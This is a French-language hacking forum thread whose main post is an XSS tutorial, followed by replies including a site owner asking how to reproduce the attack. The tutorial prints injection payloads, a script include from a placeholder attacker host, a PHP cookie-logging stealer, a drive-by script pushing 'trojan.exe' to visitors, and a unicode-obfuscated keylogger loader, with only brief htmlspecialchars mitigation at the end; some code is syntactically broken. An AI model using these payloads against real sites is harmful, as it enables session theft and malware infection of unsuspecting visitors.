Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 13-08-2011 15:46:58

Master-one
Membre Indétronable
Inscription : 10-07-2011
Messages : 165

Tuto faille XSS, exploitation et sécurisation (cross site scripting)

redaction .....

[edit modération] Tuto effacé par son auteur, restauré par HappyDad plus bas dans le topic -- antares145

Dernière modification par Master-one (17-09-2011 23:29:47)


935761signiature.jpg

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 13-08-2011 15:52:33

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Tuto faille XSS, exploitation et sécurisation (cross site scripting)

Et encore un tuto de pentest web à ton actif, merci et un grand bravo à toi Master-one pour ce tuto bien documenté sur les failles XSS smile

Je pense qu'il serait judicieux de choisir un titre plus adapté comme par exemple "Tuto faille XSS, exploitation et sécurisation"?

Hors Ligne

#3 13-08-2011 15:56:49

Master-one
Membre Indétronable
Inscription : 10-07-2011
Messages : 165

Re : Tuto faille XSS, exploitation et sécurisation (cross site scripting)

M1ck3y a écrit :

Et encore un tuto de pentest web à ton actif, merci et un grand bravo à toi Master-one pour ce tutoriel bien documenté sur les failles XSS smile

Il existe plain des tutoriels  mais pour moi la major partie n'est que du blabla pour  faire désespérer se qui veulent apprendre là j'ai simplement détaillé au maximum le plus gros de la faille xss, mais pour la petit histoire cela touche tout le monde  et cela n’est pas près de changer.


935761signiature.jpg

Hors Ligne

#4 13-08-2011 16:07:09

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Tuto faille XSS, exploitation et sécurisation (cross site scripting)

C'est justement le fait de détailler de cette manière qui rend le tuto très intéressant à lire et accessible à tous. J'édite le titre pour qu'il soit plus adapté.

Hors Ligne

#5 13-08-2011 16:13:38

Master-one
Membre Indétronable
Inscription : 10-07-2011
Messages : 165

Re : Tuto faille XSS, exploitation et sécurisation (cross site scripting)

Décidément je ne suis pas très doué pour les titrages très chers ! lol


935761signiature.jpg

Hors Ligne

#6 13-08-2011 16:49:54

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Tuto faille XSS, exploitation et sécurisation (cross site scripting)

Ca ne remet pas en cause la qualité de tes tutos, ce n'est pas bien méchant, on est là pour t'aider à choisir un titre plus adapté en cas de besoin.

Hors Ligne

#7 13-08-2011 16:57:03

Master-one
Membre Indétronable
Inscription : 10-07-2011
Messages : 165

Re : Tuto faille XSS, exploitation et sécurisation (cross site scripting)

effectivement l'entraide c'est important

comme défendre la confidentialité de chaque individu c'est aussi important si vous avez des question je suis la
- je vous est laisser un petit message dans discutions générale une petite mise en bouche  cool

Dernière modification par Master-one (13-08-2011 16:57:49)


935761signiature.jpg

Hors Ligne

#8 25-10-2011 20:11:02

HappyDad
Membre V.I.P.
Lieu : Awus036h
Inscription : 14-11-2009
Messages : 282
Site Web

Re : Tuto faille XSS, exploitation et sécurisation (cross site scripting)

[edit modération] Auteur original : Master-One, restauré par HappyDad après effacement volontaire... -- antares145

Bonjour tout le monde

Aujourd’hui je vais vous apprendre à repérer une faille xss et a l’exploiter ma devise Savoir pirater Pour mieux se protéger .Et donc nous allons faire ça  sans utiliser un seule scanner ou autre application d’audi web .

Quelqu’une faille XSS ? :

Et bien ! une faille XSS  appeler dans le jargon informatique Cross-site scripting  une faille bien particulière qui ne permet pas d'attaquer le site directement mais les utilisateurs du site ou administrateur , le but du pirate ne va pas être de visé les visiteurs  car pour lui se qui importe c’est les admin alors pour  exploiter  Cette  faille cela va consister à injecter du code(généralement du javascript) dans les champs présents dans un site , le code ainsi injecté vas aller se réfléchir sur le serveur  et revenir dans le même état (en claire) . Pour la tester, mettez le code suivant dans un champ de formulaire ou dans un paramètre passé dans l'URL:

<script>alert("hello Master-one ");</script>

et la par magie pop-up avec écrit : hello Master-one

( pour ma par je vous donne une petite astuce que je fais généralement sur différent site  pour trouver ce type de faille,  souvent et je dit bien souvent l’erreur se rencontre dans des modules de recherche ou près des symbole  , des exemples ? okok !! décidément faut tout donné !

-recherche.html?advanced=1&keyword=
- ?order=
-&=
- ?=

Vous l’aurez compris cela fais généralement appelle à une application ou  un module
( recherche pas exemple)

mettez un code java  entre c’est symbole vous verrez ça fonctionne  toujours un exemple en image :

86856763533201net.jpg
Taille HD : http://img11.hostingpics.net/pics/89570663533201net.jpg

Pour simple mesure de sécurité j’ai caché le plus important :

en repérant de tel faille sur une page c’est l’exemple typique  d‘une erreur de codage ou d’interprétation d’une application incorporer dans votre page, cette erreur est très  culotté à mon sens  pourquoi ?

Et bien  prenons l’exemple de ce code:

<?php

if(isset($_GET['pseudo']
    echo 'hello : '.$_GET['pseudo'];
else
    echo '<form method="GET"><input type="text" name="pseudo" /> <input type="submit" value="Go" /></form>';

?>

Si nous entrons "Master-on ( pour le fun) " dans le formulaire, s'affichera alors "hello Master-one". Seulement essayons d'entrer maintenant un code java  "<s>Master-one</s>", c'est alors "hello Master-one" qui est affiché, ce qui signifie que les balises (x)HTML introduites ont été mal interprétées ! On peut de même exécuter du JavaScript, qui nous permettera de gérer dynamiquement le contenu de la page et ainsi d'exploiter la faille XSS, en entrant "<script>mon script</script>" , cette faille est malgré tout redoutable car admettons que vous êtes administrateur de votre site une tel erreur dans l’administration de votre site  peut permettre à un pirate informatique de récupérer vos données  .

Alors comment  va-t-il procéder ?
Et bien  mettons que vous avez une faille a cette endroit

http://www.sitevintime.com/admin /search?q=> <script>alert(document.cookie)</script>

En sachant que la page concerner interprète mal les variables, il va se permettre d’injecter un code . Suivez bien car à mon sens c’est ici le plus intéressant,

quel code va-t-il injecter ?

et bien le code qu’il va injecter est par exemple ceci :

<script src="http://sitehacker. com/execute.js"></script>

Que va faire se code ? le site concerner auquel la faille xss est béent  va exécuter le scripte du site  hacker.com/cookies.js ce qui va permettre au pirate ah distance  de récupère les information des visiteur  ou de l’administreur qui passe sur cette page, avec un tel code comme celui-ci il va pourvoir récupérer tout bêtement vos mots de passe.  Je donne un exemple de donnée que contient l’execute.js du pirate :

<?php
$cookie = $_GET['c'];//c'est pour recupérer les cookies
$ip = getenv (‘REMOTE_ADDR’);//Pour récupérer l'ip
$date=date(“j F, Y, g:i a”);
$referer=getenv (‘HTTP_REFERER’);
$fp = fopen(‘cookies.html’, ‘a’);
fwrite($fp, ‘Cookie: ‘.$cookie.’<br> IP: ‘ .$ip. ‘<br> Date and Time: ‘ .$date. ‘<br> Referer: ‘.$referer.’<br><br><br>’);
fclose($fp);
header (“Location:http://sitepirate. com")

Grace a ce petit code cela va lui permette de réceptionner les Informations  mais !! nous pouvons aller plus loin regarder :

* <script language="javascript">
* var exepath='http://votresite.com/trojan.exe';
* var bname=navigator.appName;
* var bver=parseInt(navigator.appVersion);
* function install() {
* if ( navigator.platform && navigator.platform != 'Win32' ) {
* location.replace('about:blank');
* return;
* }
* if (bname == 'Microsoft Internet Explorer' && bver >= 2) {
* document.write('<object id="ayb" width=1 height=1 classid="CLSID:018B7EC3-EECA-11d3-8E71-0000E82C6C0D" codebase="'+exepath+'"></object>');
* } else if (bname == 'Netscape' && bver >= 4) {
* trigger = netscape.softupdate.Trigger;
* if (trigger.UpdateEnabled) {
* trigger.StartSoftwareUpdate(jarpath, trigger.DEFAULT_MODE)
* } else {
* location.replace(exepath);
* }
* } else {
* location.replace(exepath);
* }
* }
* install();
* </script>

Que va faire ce code et bien si vous avez un peu de connaissance le pirate va pourvoir envoyer un troyen à chaque visiteur de votre site , alors !!  imaginer un peu le nombre de victime infecter ! Que votre faille ferra subir  à vos visiteur  et cela ! tout simplement par ce que vous filtré mal vos variables  ( catastrophe !!)  Voyer vous ou je veux en venir ?


BON A PARTIR  D’ICI ALLER PRENDRE UN BON CAFE POUR REPRENDRE LE TUTO
ou une bonne bière !


Reprenons ! je suis soucieux du détails les pirate ne vont pas afficher en clair le script java !  Ils vont le coder afin de le dissimuler voilà un exemple concret  avant et après :

Avant :

http://www.sitevintime.com/admin /search?q=> <script src="http://votresiteperso.com/keylogger.js"></script>

Après :

http://www.sitevintime.com/admin /search?q= <script type="text/javascript">document.write('\\u003C\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u0020\\u0073\\u0072\\u0063\\u003D\\u0022\\u0068\\u0074\\u0074\\u0070\\u003A\\u002F\\u002F\\u0068\\u0061\\u0063\\u006B\\u002E\\u0063\\u006F\\u006D\\u002F\\u006B\\u0065\\u0079\\u006C\\u006F\\u0067\\u0067\\u0065\\u0072\\u002E\\u006A\\u0073\\u0022\\u003E\\u003C\\u002F\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003E');</script>

Je pense qu’il n’y a pas photo l’un passé mieux que l’autre non ? Surtout pour un visiteur ! La solution pour éviter ces failles sur son site, il faut impérativement  penser à vérifier/filtrer/nettoyer les variables qui sont susceptibles d'être modifiées par un utilisateur lambda.
Voici un exemple de code pour contrer cette faille xss

<?
print(htmlspecialchars($variable));
?>
ou
<?
echo htmlspecialchars($variable);
?>

pourquoi htmlspecialchars  -> tout simplement car il filtre les variables <> , les \\ / , et deviendront &lt &gt et donc innofensifs , les htmlenteties +ENT_QUOTE à la fin  coupleront en effet et combleront la faille
Le soucia maintenant avec l’informatique c’est que cela grandit vite, trop vite et comme tout ce qui grandit à ces vitesses vertigineuses, il est probable qu’elle grandisse incorrectement.

Et à votre avis pourquoi il y aura toujours de tel faille que cela soit xss ou autre ?
Tous simplement Pour des raisons économiques ou de marketing, les sorties de versions de systèmes d’exploitation et autres applications, se bousculent et avec une telle cadence  il est évident que tout n’est pas fait ou testé de façon professionnel.  Donc nous augmentons inévitablement  les problèmes de piratage informatique. 

Et comme je le dit toujours mettez-vous dans les peaux d’un pirate informatique en tant que webmaster car ce qui fais la différence des pirates informatiques  c’est que eux ils ont au moins la curiosité le souci du détails qui fait qui sont performant et c’est  la raison pour laquelle beaucoup d’entreprise cherche des personnes comme ça.


J’espère vous avoir aidé cordialement
Master-one

Dernière modification par HappyDad (01-11-2011 20:54:12)


logo-awus036h-petit.png logo-wifi-highpower-175x60.jpg logo-luxury.jpg logo-backtrack-5-special-edition.png

Hors Ligne

#9 01-11-2011 20:55:05

HappyDad
Membre V.I.P.
Lieu : Awus036h
Inscription : 14-11-2009
Messages : 282
Site Web

Re : Tuto faille XSS, exploitation et sécurisation (cross site scripting)

Tuto retrouvé et remis en ligne dans le post ci dessus, merci à M1ck3y smile


logo-awus036h-petit.png logo-wifi-highpower-175x60.jpg logo-luxury.jpg logo-backtrack-5-special-edition.png

Hors Ligne

#10 13-08-2012 10:57:35

laurentbreton
N00b
Inscription : 13-08-2012
Messages : 2

Re : Tuto faille XSS, exploitation et sécurisation (cross site scripting)

Salut,

Ayant subi ce type d'attaque XSS sur un ancien site/forum, je voudrais la reproduire au moins comprendre les grandes lignes.

Car j'ai ouvert récemment ma boite mail correspondant à mon site (qui était à l'abandon) et j'ai lu le mail d'un inconnu
(qui datait de plusieurs mois) me disant que mon site était vulnérable à une attaque XSS.

Le plus surprenant, "cet inconnu" a mis des captures d'écran de Mon Administration ^^ et il a cité mon password.

Moi qui me croyait être à l'abri avec mon mot de passe de 15 caractères du style: x_?molkf78/:/é"'d..........

Donc j'ai compris qu'un mot de passe blindé ne suffisait pas dans certains cas.



J'ai lu attentivement le tuto  mais je ne comprends pas certaines choses :

- "L'inconnu" place un script sur un serveur en ligne et celui-ci va créer a son tour un fichier avec cookies des informations récupérées ?



- Ce script :

<script src="http://sitehacker. com/execute.js"></script>

" L'inconnu " insére ce script dans la barre d'url de la page faillante ou directement sur le forum en tant que lien ?  Je pose cette question car je n'ai jamais cliqué sur des liens quelqu'il soit
sur mon site ou dans mes mails.

Lorsque qu'il place son script sur la page faillible, c'est uniquement sur cette page que les informations (cookies) seront récupérés ou toutes les pages du site ?




- Cette autre script est à enregistrer dans un fichier en .php ou en .js ?

<?php
$cookie = $_GET['c'];//c'est pour recupérer les cookies
$ip = getenv (‘REMOTE_ADDR’);//Pour récupérer l'ip
$date=date(“j F, Y, g:i a”);
$referer=getenv (‘HTTP_REFERER’);
$fp = fopen(‘cookies.html’, ‘a’);
fwrite($fp, ‘Cookie: ‘.$cookie.’<br> IP: ‘ .$ip. ‘<br> Date and Time: ‘ .$date. ‘<br> Referer: ‘.$referer.’<br><br><br>’);
fclose($fp);
header (“Location:http://sitepirate. com")



Cela fait plusieurs jours que je planche dessus, mais je n'y arrive pas.

Hors Ligne

#11 17-08-2012 12:55:06

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Tuto faille XSS, exploitation et sécurisation (cross site scripting)

Salut smile

Si tu a un site web et que tu ne sais pas ce que veux dire le code ci-dessus je te conseil de réviser sérieusement tes bases.

Le site du zéro est très bien pour ça smile

Etant en train de faire mon site web également ce que je peux te conseiller c'est de bien sécuriser tes variables, et ça passe aussi et surtout par ce que entre le visiteur dans l'url.Si il a eu accès a ton mot de passe il a du avoir accès a ta bdd et j'espère pour tes visiteurs que t'as pris soin d'encrypter les mots de passes.(Rajoutes un salt de ton choix en plus de l'encryptage c'est plus sur).Fais aussi gaffe a l'utilisation de PHP_SELF qui peut, en fonction de ton code, créer un trou XSS.Si tu as de pages un peu sensible a protéger met une redirection a l'intérieur sur l'accueil de ton site par exemple.Outre la faille xss, concernant la base de donnée vérifis qu'elle n'est pas vulnérable et que t'as pas des lignes de codes inutiles qui peut engendrer des failles, tu peux utiliser w3af pour ça qui te dira d'ou viens le problème, ce tool est un véritable allier pour les webmasters je trouve smile


Voila bonne chance a toi smile

Hors Ligne

#12 17-08-2012 13:42:27

laurentbreton
N00b
Inscription : 13-08-2012
Messages : 2

Re : Tuto faille XSS, exploitation et sécurisation (cross site scripting)

Bonjour Koala et je te remercie d'avoir pris du temps pour poster.

Oui, je possède un site qui est à ce jour fermé à
l'inscription) et de toute façon , il y avait que 10 inscriptions donc même si cette inconnu a eu accès à la BDD, il ne fera pas trop de mal. Mon site est à l'abandon ... pour l'instant et il sera complètement fermé bientôt.

Et non, je n'ai aucune base dans l'informatique et encore moins dans le code php ou autre, c'est une langue étrangère pour moi.

Je voudrais juste reproduire l'exploitation de cette faille mais je n'y arrive pas du tout.


Pouvez-vous me dire si ce script :

<?php
$cookie = $_GET['c'];//c'est pour recupérer les cookies
$ip = getenv (‘REMOTE_ADDR’);//Pour récupérer l'ip
$date=date(“j F, Y, g:i a”);
$referer=getenv (‘HTTP_REFERER’);
$fp = fopen(‘cookies.html’, ‘a’);
fwrite($fp, ‘Cookie: ‘.$cookie.’<br> IP: ‘ .$ip. ‘<br> Date and Time: ‘ .$date. ‘<br> Referer: ‘.$referer.’<br><br><br>’);
fclose($fp);
header (“Location:http://sitepirate. com")


- Est Complet ?
- Dois je l'enregistrer en .php ou en .js ?
- Va-t-il créer automatiquement un nouveau fichier.txt avec les cookies capturés ?


Cet autre script :

<script src="http://sitehacker. com/execute.js"></script>

- Le "execute.js" correspond au précédent script ?
- A la place de l'adresse http://sitehacker.com ... , peut-on le remplacer par :
<script src="ftp://login:[email protected]/execute.js"</script>



Vous savez, peut être que certains doivent se marrer de mon ignorance mais moi ce qui me rend malade (je suis sérieux), c'est de ne pouvoir pas reproduire cette faille en sa    chant qu'un inconnu la fait derrière mon dos.

Je demande juste un coup de main, quelque réponse et c'est tout ...

Hors Ligne

#13 18-08-2012 10:19:52

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Tuto faille XSS, exploitation et sécurisation (cross site scripting)

- Est Complet ?
- Dois je l'enregistrer en .php ou en .js ?
- Va-t-il créer automatiquement un nouveau fichier.txt avec les cookies capturés ?

Il est complet si on le laisse tel quel mais on peut l'arranger et heureusement wink le <?phpdevrait répondre a ta question.Encore une fois je te conseille d'aller voir le lien que je t'ai mis plus haut, on commence pas la tour eiffel par le haut cool


Pour l'extension .js il s'agit d'un javascript.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
35 1756 23-11-2016 16:31:33 par roofnat
3 223 21-11-2016 09:43:17 par MiscL
Épinglée :
21 14692 20-11-2016 12:53:07 par richie
0 160 29-10-2016 11:12:05 par sukawa2007
11 444 05-09-2016 15:07:25 par MiscL

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.04 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]